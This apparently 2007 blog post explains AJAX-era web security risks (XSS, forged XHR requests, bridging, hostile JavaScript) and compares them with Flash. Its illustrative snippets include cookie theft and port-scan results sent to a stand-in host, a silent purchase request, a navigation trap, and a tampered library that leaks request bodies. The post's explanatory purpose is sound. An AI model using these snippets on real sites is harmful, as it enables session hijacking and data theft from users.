
Wednesday, January 17, 2007

Web 2.0 and AJAX - fundamentally insecure?



In the past couple of days, I’ve been delving into the supposed security issues that the new Web 2.0 and AJAX-enabled sites introduce, and I have also been looking into claims I heard that for serious applications one should stick to Flash, since it is inherently more secure and better tried and tested than AJAX is today.

To investigate the inherent and publicized security issues within AJAX, we first need to understand the underlying technologies that AJAX uses. Specifically, AJAX comprises:

a) XMLHttpRequest (XHR) – relatively new functionality, added to most well-known browsers today, that allows an asynchronous communication mechanism between the browser and the web server (see the sketch after this list)

b) Client-side JavaScript – around for a long time, an implementation of the ECMAScript specification and used as the programming language for many web-based applications
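As a minimal sketch of the asynchronous request pattern from (a) – the '/search?q=ajax' endpoint and the 'results' element are hypothetical names used only for illustration:

// Create an XHR object in a cross-browser way (older Internet Explorer uses ActiveX)
function createXHR() {
  if (window.XMLHttpRequest) {
    return new XMLHttpRequest();
  }
  return new ActiveXObject('Microsoft.XMLHTTP');
}

var xhr = createXHR();
xhr.open('GET', '/search?q=ajax', true);   // 'true' makes the request asynchronous
xhr.onreadystatechange = function () {
  if (xhr.readyState === 4 && xhr.status === 200) {
    // Update part of the page without a full reload
    document.getElementById('results').innerHTML = xhr.responseText;
  }
};
xhr.send(null);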

To properly assess AJAX-related security issues, then, it makes sense to take a look at what sort of security issues these two critical underlying technologies present.

XSS – Cross-Site Scripting attacks – A Javascript and URL handling exploit

The concept here is straightforward. XSS is not a technology – it refers to a technique where a malicious user constructs an ‘evil’ input which, when passed to a trusted but vulnerable site, causes that site to compromise its users. Consider, for example, a site called www.goodsite.com which accepts a search query like www.goodsite.com/q=mysearch. Now let us assume that goodsite.com does not do a good job of validating the input it receives. One could construct a URI like www.goodsite.com/q=(insert malicious script code here) and send it off to goodsite. If goodsite let this pass, the script would, in effect, be executed in the context of the user’s browser session. So, if I were to send you this URI and you clicked it, I could, for example, hijack your session cookie at goodsite and have it sent to me via embedded JavaScript (JavaScript can issue cross-domain requests, for instance by setting an image source). If you think this is trivially avoidable, you’d be surprised at how many ways there are to bypass web server checks. For example, take a look at the MySpace exploit that used dynamic HTML and fragmented text blocks to keep substring matches from being caught by the web server’s parser.
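To make the goodsite.com scenario concrete, here is a hedged sketch of what a crafted URI and its payload might look like (goodsite.com, evil.example.com and steal.js are all hypothetical names):

// The URI an attacker might mail out, assuming goodsite echoes the query back unescaped:
//   http://www.goodsite.com/q=<script src="http://evil.example.com/steal.js"></script>
//
// The injected steal.js then runs inside the victim's goodsite.com session and can
// ship the session cookie off-site by requesting a cross-domain image:
new Image().src = 'http://evil.example.com/steal?c=' + encodeURIComponent(document.cookie);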

Ideally, one could argue that XSS should be impossible: all web servers MUST ensure that special characters in user input are made ‘safe’ (encoded using HTML entities) so that they are only displayed, rather than interpreted, on the receiving side. However, with the increasing popularity of responsive web sites using AJAX-related technologies, mash-ups are becoming very common, and the ability for one domain to pass on data for remote script execution helps in managing load on the local host. XSS-related vulnerabilities have been around for a long time and have successfully infected a variety of web-based solutions, including PHP bulletin boards, Google, Apache, Mozilla, MySpace, Yahoo and many more.
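As a minimal sketch of the ‘safe’-izing idea (shown in JavaScript for illustration; in practice the web server or templating layer should do this before the data reaches the page):

// Replace the characters the browser would otherwise interpret as markup,
// so that user input is displayed rather than executed.
function htmlEscape(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}
// '<script>alert(1)</script>' becomes '&lt;script&gt;alert(1)&lt;/script&gt;'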

It is important to note that XSS depends on the following:

a) You somehow pass on a ‘malicious’ URI to a user and get him to click on it (it doesn’t make sense to trigger the XSS vulnerability in your own browser context, unless you think you can launch a remote exploit due to a buffer underflow or overflow – that is a different attack, and not categorized under XSS attacks – more on this later)

b) It assumes that the web server receiving this input does not do a good job of validating it


Effect of Web 2.0 on XSS attacks

Does Web 2.0 impact the risks of XSS attacks? Yes and no. Technically speaking, XSS has nothing to do with Web 2.0 and AJAX. It is a vulnerability that existed well before AJAX as a term was even coined; XSS attacks started surfacing almost as soon as JavaScript was introduced. However, with the proliferation of Web 2.0 sites, there is a significant increase in collaboration, mash-ups and multi-tenancy, which all mean the same thing – there is a larger audience which can now be targeted for vulnerabilities. So the ‘no’ was a technical response and the ‘yes’ a market response – due to adoption. That is not to say that ‘Web 2.0 results in increased XSS vulnerabilities’. The right statement would be ‘Web 2.0 results in more people using potentially vulnerable technologies, which, unless hardened, have a wider possibility of financial and reputation damage’ (heck, sounds like a lawyer crafted that, but you get what I mean).

In addition, multi-tenancy (different applications on a single cluster of hosts) means an exposed vulnerability in one application can compromise others, unless the multi-tenant host takes very special care of intra-trust-domains (providers usually do a good job on inter-trust-domains, but lag on trust within their own domain, which is why once you get in, you can usually do a lot of damage on periphery nodes).


XMLHttpRequest (XHR) & Javascript Repudiation Attacks

This is really a derivative attack on a compromised site (it is interesting to note that most of these attacks rely on implementation gaps in web servers). Assuming you manage to get malicious script code in, you can use XHR to issue any number of HTTP requests that automatically ‘agree to some terms of service’, ‘buy an item’ and so on, provided they don’t require any specific user input not already known to the environment. The exact same thing is possible with plain JavaScript, so this is not really specific to AJAX (the only new thing AJAX brought in was XHR – JavaScript existed much before that). Since the web server does not know whether a request came from an embedded XHR call or an explicit user click, it cannot differentiate between the two.
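A hedged sketch of the kind of request an injected script could fire silently – the '/cart/buy' endpoint and its parameters are hypothetical; from the server’s point of view it is indistinguishable from the user clicking the real button:

var xhr = window.XMLHttpRequest ? new XMLHttpRequest()
                                : new ActiveXObject('Microsoft.XMLHTTP');
xhr.open('POST', '/cart/buy', true);   // same origin as the compromised page, so XHR allows it
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send('item=1234&qty=1&agree_tos=yes');   // rides on the victim's existing session cookie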


Effect of Web 2.0 on Repudiation Attacks

Once again, with the hype and slickness of XHR+JS applications proliferating around the web, more people should concentrate on architecture and data protection instead of only focussing on ‘how to make the interface slicker’. So again, Web 2.0 does not technically make the situation worse, but in the surge of trying to get out prettier applications, developers need to go back to the basics of implementing a secure environment for distributed systems and validating input.

(AJAX) Bridging

Bridging is a software concept that long pre-dates Web 2.0. In effect, it is the process of installing a ‘gateway server’ in between multiple content sources. This ‘gateway server’ maintains a trusted relationship with the backend content servers and is therefore also capable of hosting the integration logic for how to ‘mesh’ these diverse contents together. This sort of bridging has increased in popularity with the deployment of mash-up applications, and it introduces another twist to XHR attacks. XHR cannot access HTTP pages outside the domain being served. For example, if a script is running at www.google.com, XHR can’t make an HTTP request to www.yahoo.com. However, if the application is being hosted on a bridge server, one could use the bridge server URI to access content on the other backend site (for example, if the bridge server knowingly or unknowingly supports URI redirection). Do note that JavaScript also supports this capability, so you don’t need XHR for this; but now that browsers also support XHR, even if the usual JS tricks are blocked, one could launch similar exploits through it. What then happens is that, by a transitive relationship, if Yahoo were to offer its APIs to a trusted site, the users of that trusted site could now target attacks on Yahoo using common tricks like SQL injection, DoS (repeated HTTP requests via XHR in bulk) and similar.
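A hedged sketch of the transitive-trust problem, assuming the hosting site exposes a hypothetical '/bridge?url=' redirection endpoint:

var xhr = window.XMLHttpRequest ? new XMLHttpRequest()
                                : new ActiveXObject('Microsoft.XMLHTTP');
// Same-origin as far as the browser is concerned, but the bridge server fetches
// the third-party backend on the script's behalf.
xhr.open('GET', '/bridge?url=' + encodeURIComponent('http://www.yahoo.com/some/api'), true);
xhr.send(null);
// Repeated in bulk, or with crafted parameters (SQL injection attempts and the like),
// this turns the bridge's trusted relationship against the backend site.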

Effect of Web 2.0 on XHR Bridging Attacks

Web-based mash-up applications are proliferating today, and the use of bridge servers to blend content from multiple sites is becoming much more commonplace (for instance, mashing Google Maps with craigslist, house searches and more). As in any architecture, the fundamental principle that ‘a chain is only as strong as its weakest link’ applies equally here.

Javascript ‘Script Kiddie’ Tricks

This is a compendium of tricks which have plagued immature implementations of JavaScript. Many of these tricks are very irritating and can destroy the user experience. For example, Pascal Meunier maintains a list of some of these irritants, which work even today on the most recent browsers, and they include:
a) Dynamically generating a fake page for a valid URI – a simple JavaScript trick where, if you visit http://bad.com and click on a link there for ‘google.com’, your browser URL can change to google.com while displaying some other crafted page (it works in IE7; FF2.0 smartly displays the URL redirection)
b) Nasty JS code that traps browser events and does not let you navigate away from the page unless you close the browser (see the sketch below)

And more.
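A minimal sketch of trick (b), the navigation trap:

// Trap the unload event so the browser interrupts every attempt to leave the page.
window.onbeforeunload = function () {
  return 'Are you sure you want to leave this page?';   // shown in a blocking dialog
};
// Some variants also grab focus back whenever the user switches away.
window.onblur = function () { window.focus(); };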

Of course, JS being a programming language, it can also be used for more serious purposes – like port scanning your own network and potentially reporting the results to an external site.
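A hedged sketch of how such a scan could work, using image-load timing against a hypothetical internal address and reporting to a hypothetical attacker URL (real browsers restrict some ports, so this is an illustration of the idea, not a reliable tool):

function probe(host, port, timeoutMs) {
  var reported = false;
  var start = new Date().getTime();
  var report = function (guess) {
    if (reported) { return; }
    reported = true;
    // Leak the result cross-domain via an image request (evil.example.com is hypothetical)
    new Image().src = 'http://evil.example.com/log?host=' + host + '&port=' + port +
                      '&guess=' + guess + '&ms=' + (new Date().getTime() - start);
  };
  var img = new Image();
  img.onerror = function () { report('open'); };   // something answered, just not with an image
  img.onload  = function () { report('open'); };
  setTimeout(function () { report('closed-or-filtered'); }, timeoutMs);
  img.src = 'http://' + host + ':' + port + '/';
}
probe('192.168.1.1', 80, 2000);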

Effect of Web 2.0 on JS Vulnerabilities

Most of the Web 2.0 world relies heavily on JavaScript. In fact, I can point you to hundreds of sites that blindly download ‘JS+XHR (AJAX) toolkits’ like prototype.js or others and start using their functions. Just as an example, prototype.js is a 64KB file densely packed with XHR and JS code. How many people actually look into that file? What stops me from hosting a malicious prototype.js file, having people download it and use it in their own context, and having their context-sensitive information sent out? With the increasing use of JS in commercial sites in the quest for a better user experience, the inherent implementation gaps of JS interpreters in browsers can do much more damage, simply because JS is now used in many more mainstream functions than before.
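As a hedged illustration (not actual prototype.js code) of why a library you didn’t audit is a risk: a tampered copy could wrap XHR and copy every request body to a third party before sending it on.

(function () {
  var originalSend = XMLHttpRequest.prototype.send;
  XMLHttpRequest.prototype.send = function (body) {
    try {
      // Quietly leak the request body to an attacker-controlled server (hypothetical URL)
      new Image().src = 'http://evil.example.com/collect?d=' + encodeURIComponent(body || '');
    } catch (e) { /* fail silently so the host application keeps working */ }
    return originalSend.apply(this, arguments);
  };
})();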

XHR+JS insecurities vs. Flash

Comparing this to Flash, when I googled around for vulnerabilities, most of those I came across had to do with buffer exploits. Simply put, buffer exploits are a set of techniques where a malicious user finds a spot of executable code that does not check input length and, using that, provides a string long enough to overflow the buffer allocated for it. In addition, the string is crafted with machine opcodes at the right place, which causes the return address of that function to point to an address within the string, which is actually an encoded instruction sequence. Effectively, the remote user has managed to execute code on the target platform, thereby launching an internal attack. Such attacks are very old and still prevalent. A great tutorial (old, but gold) on buffer exploits can be read here.

So while I found such buffer exploits, I did not have much success finding ActionScript-related exploits similar in nature to those mentioned above. I did find references in random forum posts saying that a few years ago ActionScript in Flash was at a similar stage, but it seems the implementation has improved over the years. Again, this was a cursory look – I’d be happy to be pointed to similar exploits in the Flash world.

Buffer exploits will always remain – finding and exploiting them doesn’t need an open programming-language interface like JS. These exploits require more skill to probe and compromise (yes, I am aware of automated buffer exploit scanners, but applying them to different environments requires more skill) and are usually an art practiced by a smaller niche community.

However, in the entire Flash vs. AJAX security debate, I do have another concern. JS and XHR exploits need to be fixed by the ‘browser’ owners – Microsoft, Mozilla, Apple and others – while Flash exploits need to be fixed by Adobe and can be addressed independently of the browser, since Flash is a third-party browser plugin while JS and XHR are core browser implementations. I wonder whether this means that relying on browser companies to fix issues takes longer than relying on Adobe to fix a plugin issue. Anyway, as Web 2.0 with AJAX continues to go mainstream, only time will tell.

Conclusion

What we observe, then, is that most of the vulnerabilities attributed to AJAX have little to do with AJAX and more to do with the inherent vulnerabilities of immature implementations and bad architectural choices by developers. Most of the vulnerabilities above boil down to:

a) User input is not validated well
b) Data integrity and logical firewalling are not thought out well
c) Current implementations of JavaScript in browsers are rather dismal
d) If your architecture is insecure, no technology can rescue you

What Web 2.0 is doing is making these technologies mainstream. As more people use them, many more bugs come out, and many more people think of hacking insecure sites for fun and profit (nothing new in that). I think overall this will be beneficial for the web community - there is nothing like taking a technology mainstream to make it robust! But in the process, developers and marketers need to be aware that this is an evolving process and should do everything possible to safeguard their own data from the imperfections in the implementations of their chosen tools.

References
http://namb.la/popular/tech.html
http://ajaxian.com/by/topic/security/
http://www.technicalinfo.net/papers/CSS.html
http://insecure.org/stf/smashstack.html
http://www.actionscripthero.com/adventures/

http://www.viruslist.com/en/analysis?pubid=184625030
